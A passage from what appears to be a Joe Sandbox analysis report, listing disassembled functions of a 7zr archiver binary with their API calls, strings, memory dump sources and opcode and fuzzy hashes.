                                              • Opcode Fuzzy Hash: 87c965d2819866b9b9dff881d423a01ab4df8403da50ee2593f0c08a4dbce634
                                              • Instruction Fuzzy Hash: B331F97290021D9BCF59EBE5C8529FEBBB4BF14350F400069E706731D1DB715B89EAA2
                                              Function 00D26025 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31COMMON
                                              Download Yara Rule
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00D2602A
                                              • EnterCriticalSection.KERNEL32(00DB2938), ref: 00D26044
                                              • LeaveCriticalSection.KERNEL32(00DB2938), ref: 00D26060
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: CriticalSection$EnterH_prologLeave
                                              • String ID: v
                                              • API String ID: 367238759-3261393531
                                              • Opcode ID: a0171a0bfdedbf5efa507fbe2a15c37f2cb6817e5b07c4497af01f0e6cf49877
                                              • Instruction ID: 607c7772d37c2ea0000f0c41cb504b6aa5137948f35cff4dadac2a3a0930e529
                                              • Opcode Fuzzy Hash: a0171a0bfdedbf5efa507fbe2a15c37f2cb6817e5b07c4497af01f0e6cf49877
                                              • Instruction Fuzzy Hash: 7CF0F436910214EFCB019F98D909A9EBBA8EF45354F14846AF405A7311C7B59A008BB4
                                              Function 00CFA4C5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20libraryloaderCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetModuleHandleW.KERNEL32(ntdll.dll,?,00CFA3C1,00000001), ref: 00CFA4CD
                                              • GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 00CFA4DD
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: AddressHandleModuleProc
                                              • String ID: RtlGetVersion$ntdll.dll
                                              • API String ID: 1646373207-1489217083
                                              • Opcode ID: 5fbef7fb2e3f71537d8137ecf6b537506354747089432d18572053346c50903e
                                              • Instruction ID: ce7571017b3b9c5daedb64bc2f675c561b06fa3e648e2e641dcabdc3a3cabeb3
                                              • Opcode Fuzzy Hash: 5fbef7fb2e3f71537d8137ecf6b537506354747089432d18572053346c50903e
                                              • Instruction Fuzzy Hash: 92D0C7713743101FBBA067B5BC4EBF6165C8B41B51706A457F914D1140E6D49E8241BA
                                              Function 00D10306 Relevance: 6.1, APIs: 4, Instructions: 89COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetFileSecurityW.ADVAPI32(?,00000007,?,?,00000000,?,?,00000000,?), ref: 00D10359
                                              • GetLastError.KERNEL32(?,?,00000000,?), ref: 00D10382
                                              • GetFileSecurityW.ADVAPI32(?,00000007,?,?,00000000,?,?,?,00000000,?), ref: 00D103DA
                                              • GetLastError.KERNEL32(?,?,00000000,?,?,?,00000000,?), ref: 00D103F0
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: ErrorFileLastSecurity
                                              • String ID:
                                              • API String ID: 555121230-0
                                              • Opcode ID: 984739d37d42f6b37db2b4f74ed50a0331e9080bbfcce82c37e0ff90fe46d4be
                                              • Instruction ID: 7b282cb2d145735ac6b591deb219d1bf98f70cc0d0903306440972695c5a83c8
                                              • Opcode Fuzzy Hash: 984739d37d42f6b37db2b4f74ed50a0331e9080bbfcce82c37e0ff90fe46d4be
                                              • Instruction Fuzzy Hash: 33313874900209FFDB10EFA4D880BEEBBB5FF48344F148959E466D7251DBB0AA81DB60
                                              Function 00CF82FB Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                              Download Yara Rule
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00CF8300
                                              • GetFileInformationByHandle.KERNEL32(000000FF,?,?,00000000,00000001,00000003,02200000,?,?,?), ref: 00CF834F
                                              • DeviceIoControl.KERNEL32(000000FF,000900A8,00000000,00000000,00000000,00004000,?,00000000), ref: 00CF837C
                                              • memcpy.MSVCRT(?,?,?,?,?,00000000,00000001,00000003,02200000,?,?,?), ref: 00CF839B
                                                • Part of subcall function 00CF1E40: free.MSVCRT ref: 00CF1E44
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: ControlDeviceFileH_prologHandleInformationfreememcpy
                                              • String ID:
                                              • API String ID: 1689166341-0
                                              • Opcode ID: 75a7c82d7f0bdcc06cf3b732fbcd7b92966b89e8f58972a7bb8c07236616df5f
                                              • Instruction ID: 6fad66e34db0e74ed88107da755215cd1386a9400cfcbd4db946498fa373b6e7
                                              • Opcode Fuzzy Hash: 75a7c82d7f0bdcc06cf3b732fbcd7b92966b89e8f58972a7bb8c07236616df5f
                                              • Instruction Fuzzy Hash: D121D376500208AFDF14AF94DC85EFE7BB9EF84740F14002EFA14A72A1CA314E08D675
                                              Function 00D360D2 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 157COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID: BlockPackSize$BlockUnpackSize
                                              • API String ID: 3519838083-5494122
                                              • Opcode ID: 1947015b59f6615e6246837a08f03826b9a103883406a7859ad18cc0f27558b2
                                              • Instruction ID: 98799bcad271c90561cd8652e346740bc3b02afe46ca0f151016a832e689e353
                                              • Opcode Fuzzy Hash: 1947015b59f6615e6246837a08f03826b9a103883406a7859ad18cc0f27558b2
                                              • Instruction Fuzzy Hash: 8C51D675800684BECF39CBA4C8A1AFE7BA1AF16300F1EC05EE19657195D621D98CE729
                                              Function 00CFA4F3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 89stringCOMMON
                                              Download Yara Rule
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00CFA4F8
                                                • Part of subcall function 00CFA384: __EH_prolog.LIBCMT ref: 00CFA389
                                                • Part of subcall function 00CF9E14: GetSystemInfo.KERNEL32(?), ref: 00CF9E36
                                                • Part of subcall function 00CF9E14: GetModuleHandleA.KERNEL32(kernel32.dll,GetNativeSystemInfo), ref: 00CF9E50
                                                • Part of subcall function 00CF9E14: GetProcAddress.KERNEL32(00000000), ref: 00CF9E57
                                              • strcmp.MSVCRT ref: 00CFA564
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: H_prolog$AddressHandleInfoModuleProcSystemstrcmp
                                              • String ID: -
                                              • API String ID: 2798778560-3695764949
                                              • Opcode ID: 23d12d18805aa637dc420640629e4e4d6c62e036ae9d180566a592939ecfea70
                                              • Instruction ID: a3fbe20a7e6d3921b8018f5dfb56371beaea869d88d1fbcc1d0a595206f2e5b4
                                              • Opcode Fuzzy Hash: 23d12d18805aa637dc420640629e4e4d6c62e036ae9d180566a592939ecfea70
                                              • Instruction Fuzzy Hash: A1313772D0020DEACF99FBE0D8529FDF775AF54710F14402AFA1172192DB315A49EA63
                                              Function 00D26184 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 66COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID: 0$x
                                              • API String ID: 3519838083-1948001322
                                              • Opcode ID: cdb5312ba5a02f59ee449915cc037bbdd31bbda6af25cb17c3c2e9ef6fe0747d
                                              • Instruction ID: cbb344adc2962136d37a5e71bb0a706936863f5f3eca8994df89e5d01d45a058
                                              • Opcode Fuzzy Hash: cdb5312ba5a02f59ee449915cc037bbdd31bbda6af25cb17c3c2e9ef6fe0747d
                                              • Instruction Fuzzy Hash: 3D216F36D0122DDBCF09EB98D9956EDB7B5FF58304F14006AE901B7281DB756E04CBA1
                                              Function 00D282DD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: fputs
                                              • String ID: =
                                              • API String ID: 1795875747-2525689732
                                              • Opcode ID: 5622788360ce0a78189cdd17bda9c7079a3401d91005038d811cf56e39911d3d
                                              • Instruction ID: 23e5b3fd2f33d98ef4393120487108e9cd85b9e1976a8714605391400a053721
                                              • Opcode Fuzzy Hash: 5622788360ce0a78189cdd17bda9c7079a3401d91005038d811cf56e39911d3d
                                              • Instruction Fuzzy Hash: 0BE0DF31A00228EBCF00EBECAC418BE7B69EB843587040823E911D7240EA70D925DBF4
                                              Function 00D541C0 Relevance: 5.1, APIs: 4, Instructions: 57COMMON
                                              Download Yara Rule
                                              APIs
                                              • memcmp.MSVCRT(?,00DA48A0,00000010), ref: 00D541D6
                                              • memcmp.MSVCRT(?,00DA0168,00000010), ref: 00D541F1
                                              • memcmp.MSVCRT(?,00DA01E8,00000010), ref: 00D54205
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: memcmp
                                              • String ID:
                                              • API String ID: 1475443563-0
                                              • Opcode ID: cc285ac52ac5d6b9c332aadedcb2c5fef08dffc2a74daf2f7c63d8ff1b7aa083
                                              • Instruction ID: f3b88d5e8320a18e61eaf2f234d9041e0610f027f0f667d1f246bf247d454ee2
                                              • Opcode Fuzzy Hash: cc285ac52ac5d6b9c332aadedcb2c5fef08dffc2a74daf2f7c63d8ff1b7aa083
                                              • Instruction Fuzzy Hash: 9A0126313403046BDB106B11CC82FBE77A4DB65751F048438FE85DB281F2B4EAA88375